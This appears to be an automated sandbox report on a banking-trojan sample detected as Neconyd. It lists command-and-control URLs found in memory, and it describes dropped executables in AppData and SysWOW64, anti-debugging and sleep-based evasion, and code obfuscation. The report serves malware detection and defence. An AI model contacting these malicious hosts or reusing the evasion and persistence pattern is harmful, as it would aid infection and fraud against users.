Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/78/665.htmlH
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/875/87.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/908/776.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/908/776.htmlFTv-1
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/908/776.htmla0
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/956/959.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/956/959.html0473447
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lousta.net/956/959.htmlw
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/353/421.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/353/421.html$E
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/457/998.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/457/998.html-559bf06f72796be679
Source: omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/457/998.html~
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/488/933.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/488/933.htmlasuek.com
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/488/933.htmldZI-&
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/488/933.htmlom
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/516/243.html
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/516/243.html&
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/516/243.html0
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/516/243.htmlwLt
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/781/119.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/781/119.html)
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/781/119.html4
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/781/119.htmlf
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/785/70.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/8.htmlshqos.dll.mui
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mkkuei4kdsz.com/978/939.html
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/292/164.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/292/164.html.E
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/292/164.htmlam
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/434/722.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/537/167.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/537/167.html;Q
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/537/167.htmlwm
Source: omsecor.exe, 00000001.00000002.1883206861.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.html
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.html#L
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.html$
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.html5L
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.html;L
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.htmlD
Source: omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.htmlULV
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/546/102.htmlf
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/763/794.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/763/794.html6Z
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/763/794.htmlZZ
Source: omsecor.exe, 00000006.00000002.3024294943.0000000000195000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/776/947.html
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/776/947.htmlPZ
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/776/947.htmlnZ
Source: omsecor.exe, 00000006.00000002.3024460419.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/776/947.htmlrZC-
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2259943860.0000000000194000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.html
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.html/
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.html3
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.html7
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.htmlA
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.htmlN
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/945/466.htmlasuek.com
Source: omsecor.exe, 00000001.00000002.1883482540.0000000000660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/en-GB
Source: bd0wJGTae5.exe, omsecor.exe.1.dr, omsecor.exe.0.dr	String found in binary or memory: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon
Source: omsecor.exe, 00000006.00000002.3024294943.0000000000195000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ow5dirasuek.com/p

E-Banking Fraud

Yara detected Neconyd

Source: Yara match	File source: Process Memory Space: bd0wJGTae5.exe PID: 6712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 6792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 6524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: omsecor.exe PID: 764, type: MEMORYSTR

Creates files inside the system directory

Source: C:\Users\user\AppData\Roaming\omsecor.exe	File created: C:\Windows\SysWOW64\omsecor.exe			Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	File created: C:\Windows\SysWOW64\merocz.xc6			Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_00401C41	0_2_00401C41
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040D2A4	0_2_0040D2A4
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040B51C	0_2_0040B51C
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040CBD0	0_2_0040CBD0
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_00401C41	2_2_00401C41
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040D2A4	2_2_0040D2A4
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040B51C	2_2_0040B51C
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040CBD0	2_2_0040CBD0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: String function: 00405511 appears 56 times
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: String function: 00405511 appears 56 times

PE / OLE file has an invalid certificate

Source: bd0wJGTae5.exe

Static PE information: invalid certificate

Source: bd0wJGTae5.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.bank.troj.evad.winEXE@7/3@3/3

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_0040A057 GetForegroundWindow,CoCreateInstance,SetForegroundWindow,

0_2_0040A057

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

File created: C:\Users\user\AppData\Roaming\omsecor.exe

Source: bd0wJGTae5.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: bd0wJGTae5.exe

ReversingLabs: Detection: 86%

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

File read: C:\Users\user\Desktop\bd0wJGTae5.exe

Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess

Source: unknown	Process created: C:\Users\user\Desktop\bd0wJGTae5.exe "C:\Users\user\Desktop\bd0wJGTae5.exe"
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomove
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomove	Jump to behavior

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\omsecor.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\AppData\Roaming\omsecor.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040D293 push ecx; ret	0_2_0040D2A3
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040CBB5 push ecx; ret	0_2_0040CBC8
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040D293 push ecx; ret	2_2_0040D2A3
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040CBB5 push ecx; ret	2_2_0040CBC8

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\omsecor.exe

Executable created and started: C:\Windows\SysWOW64\omsecor.exe

Drops PE files to the windows directory (C:\Windows)

Drops PE files

Source: C:\Users\user\AppData\Roaming\omsecor.exe	File created: C:\Windows\SysWOW64\omsecor.exe			Jump to dropped file
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	File created: C:\Users\user\AppData\Roaming\omsecor.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\omsecor.exe

File created: C:\Windows\SysWOW64\omsecor.exe

Jump to dropped file

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,	0_2_0040350F
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,	0_2_004039EA
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,	2_2_0040350F
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,	2_2_004039EA

Found evasive API chain (may stop execution after accessing registry keys)

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\omsecor.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

API coverage: 8.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 6776	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe TID: 404	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe TID: 2088	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\omsecor.exe TID: 2088	Thread sleep time: -180000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\omsecor.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_0040ABD9 FindFirstFileW,FindClose,	0_2_0040ABD9
Source: C:\Users\user\Desktop\bd0wJGTae5.exe	Code function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	0_2_00408248
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_0040ABD9 FindFirstFileW,FindClose,	2_2_0040ABD9
Source: C:\Windows\SysWOW64\omsecor.exe	Code function: 2_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,	2_2_00408248

Source: C:\Windows\SysWOW64\omsecor.exe

Thread delayed: delay time: 60000

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: omsecor.exe, 00000001.00000002.1883482540.0000000000682000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1883482540.000000000061E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.000000000069E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2260322260.00000000006FB000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000006.00000002.3024460419.000000000067E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: omsecor.exe, 00000002.00000002.2260322260.00000000006FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWgRJJ

Source: C:\Users\user\Desktop\bd0wJGTae5.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\omsecor.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\bd0wJGTae5.exe

Code function: 0_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0040CD66

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\bd0wJGTae5.exe